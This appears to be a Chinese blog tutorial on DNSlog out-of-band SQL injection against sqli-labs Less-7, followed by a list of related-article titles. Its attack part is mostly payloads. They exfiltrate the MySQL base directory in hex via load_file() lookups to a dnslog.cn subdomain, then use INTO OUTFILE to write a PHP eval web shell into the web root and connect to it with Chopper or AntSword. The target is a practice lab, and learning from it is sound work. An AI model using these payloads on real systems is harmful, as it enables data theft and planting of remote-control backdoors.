之前看到的思路今天来整整^^;
dnslog网址:http://www.dnslog.cn/

拿我们熟悉的sqli-labs,第7关来开刀^^;

正常显示:

错误显示:

猜测到注入点是字符型,单引号加两个小括号,?id=1’))

OK那接下来在用dnslog之前得看一下mysql中secure_file_priv变量得值;
因为配置值不同会产生影响:

修改这个变量值可以通过my.ini去进行修改,如果my.ini没有这个变量自行加上即可。
修改完记得重启然后检查一下是否修改成功:

接下来就可以利用读文件函数load_file(),结合dnslog.cn网站,实现带外攻击。
构造payload:

虽然执行完页面还是会显示报错,但不影响获取结果:

拿完库名接下来的表名等自行修改即可。

还可以通过dnslog 来获取文件路径:
构造payload为:
http://localhost/sqli-labs/Less-7/?id=1’)) and load_file(concat(’\\’,(substr(hex(@@basedir),1,30)),’.umgkxt.dnslog.cn\coke’)) --+

http://localhost/sqli-labs/Less-7/?id=1’)) and load_file(concat(’\\’,(substr(hex(@@basedir),31,30)),’.umgkxt.dnslog.cn\coke’)) --+


然后拼接起来十六进制解码得出:


获取到文件路径可以进行写入文件了;
构造语句:?id=-1’)) union select 1,2,’<?php @eval($_REQUEST[coke])?>’ into outfile ‘D:\phpstudy\phpstudy_pro\WWW\99.php’ --+
来到网站目录下,发现写入成功:
也可以使用into dumpfile来写入;
然后通过菜刀,蚁剑等工具进行连接即可。

DNSlog注入思路相关推荐

  1. jinja2模板注入_Flask jinja2 模板注入思路总结

    Flask jinja2 模板注入思路总结 前言 虽然这个漏洞已经出现很久了, 不过偶尔还是能够看到翻了翻 freebuf 上好像只有 python2 的一些 payload, 方法也不是很全我找来找 ...

  2. SQL注入之什么是加密注入|二次漏洞注入|DNSlog注入

    加密注入.二次漏洞注入.DNSlog注入 加密注入: 什么是加密注入??下面将由一个例子阐述: 以sqlilabs-less-21为例 1.在登录界面输入账户密码提交抓包 2.在抓到这条数据,将uma ...

  3. 常见操作系统命令注入思路

    常见操作系统命令注入思路 一.什么是命令注入: 命令注入: OS command injection翻译过来是操作系统命令注入,它可以让攻击者可以在运行应用程序的服务器上执行任意的操作系统(Opera ...

  4. (17)网络安全:cookie注入、二次注入、DNSlog注入、中转注入、堆叠注入的原理及注入过程

    目录 cookie注入 sqli-lasb-master less-21 方法一:用burpsuite进行抓包后修改 方法二:安装火狐的cookie manager等插件进行修改cookie 第一步: ...

  5. SQL注入——DNSLOG注入

    SQL注入--DNSLOG注入 SQL注入--DNSLOG注入 SQL注入--DNSLOG注入 一.原理 一.原理 当我们遇到盲注漏洞的时候,注入过程没有回显,手工测试会花费大量的时间,如果用sqlm ...

  6. bWAPP中SQL注入思路

    bWAPP中SQL注入思路 SQL Injection (GET/Search) 等级:low 首先看看正常搜索的情况,这里我输入了一个字母b,可以看出来他把标题带有b的电影信息全都给搜出来了 在这里 ...

  7. 从PDO下的SQL注入思路到获得GIT 3000star项目0day

    0x01 PDO简介 PDO全名PHP Data Object PDO扩展为PHP访问数据库定义了一个轻量级的一致接口.PDO提供了一个数据访问抽象层,这意味着,不管使用哪种数据库,都可以使用相同的函 ...

  8. SQL注入-盲注-时间注入-报错注入-布尔盲注-DNSlog注入-宽字节注入-WAF绕过-SqlMap使用

    Sqli-labs的安装 1.安装WAMP http://www.wampserver.com/ WAMP是php + mysql + Apache环境集成工具 2.下载Sqli-labs https ...

  9. sql注入 思路及sqli靶场

    判断是否为动态页面 输入不同的id 看回显 内容不同则为动态页面 判断闭合符号 输入\ 回显中\后面的就是闭合符号 判断是否存在SQL注入 输入1') and 1=1.如果得到输出结果,证明用户可通过 ...

  10. 特别详细的POST 注入 思路

    post注入是通过对输入框进行传参,可以被带入数据库进行的查询 # 注入的两个条件:1.用户可以控制传参,2.用户输入的语句被带入数据库进行查询 1.查询是否有注入点 对输入框填入一些闭合的符号,看页 ...

最新文章

  1. 霍尼韦尔epks 操作 组态 维护 使用 硬件 手册_标准四合一气体检测仪霍尼韦尔MiniMAX X4...
  2. java 取字符的ascii_如何用java获得字符串的ASCII值
  3. 去除IE10自带的清除按钮
  4. C/C++课程设计 ——货物管理系统
  5. 开账户root远程桌面
  6. centos7 如何重启web服务_CentOS7重启网络服务失败。
  7. linux 多线程 多进程 利用率,多进程与多线程的深度比较
  8. 都说人工智能入门难?但80%的人都错了……
  9. QList、QVector、QMap容器类
  10. mft按钮设计_《ZEMAX光学设计超级学习手册》一一1.2 用户界面
  11. windows内核开发笔记九:内核开发分页内存与非分页内存
  12. 使用脚本把360极速浏览器修改为极速模式
  13. 西安互联网公司和生活成本
  14. 怎样将int转换为byte
  15. uint8数据类型图片和double数据类型图片的转化和显示
  16. 记录:mysql的binlog日志开启与数据恢复
  17. 微信获取openId
  18. STM32 VCP PC端安装驱动失败的问题解决
  19. 二叉树的遍历(递归、非递归)
  20. 第46届icpc 沈阳 J-Luggage Lock(思维 + 爆搜 / 队友玄学出法, 还没看懂)

热门文章

  1. VoLTE网络各节点功能介绍
  2. Voyage自动驾驶测试场景开源文档介绍
  3. latex设置times new roman新罗马字体
  4. c语言编译功率谱密度函数,科学网—6、功率谱密度函数估计 - 柏世平的博文
  5. Linux 命令(223)—— reboot 命令
  6. 热血传奇之资源文件与地图的读取分析
  7. 自定义TimeLine
  8. 手机云台——灵眸Osmo Mobile 2
  9. 《增量绩效管理》读后感--回归产品,增量产出
  10. linux获取pc指针地址,为什么pc可以看成使程序存储器的地址指针